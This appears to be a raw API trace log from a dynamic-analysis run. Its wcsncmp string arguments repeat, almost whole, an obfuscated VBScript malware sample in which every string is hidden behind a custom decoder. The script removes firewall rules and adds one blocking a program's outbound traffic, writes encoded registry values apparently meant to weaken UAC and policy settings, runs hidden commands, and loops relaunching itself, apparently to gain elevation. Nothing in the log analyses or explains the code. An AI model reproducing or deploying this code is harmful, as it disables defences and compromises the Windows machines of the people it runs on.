bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0222.927] wcsncmp (_String1="dfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87 [0222.927] wcsncmp (_String1="fheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 89 [0222.927] wcsncmp (_String1="heCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 91 [0222.927] wcsncmp (_String1="eCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf 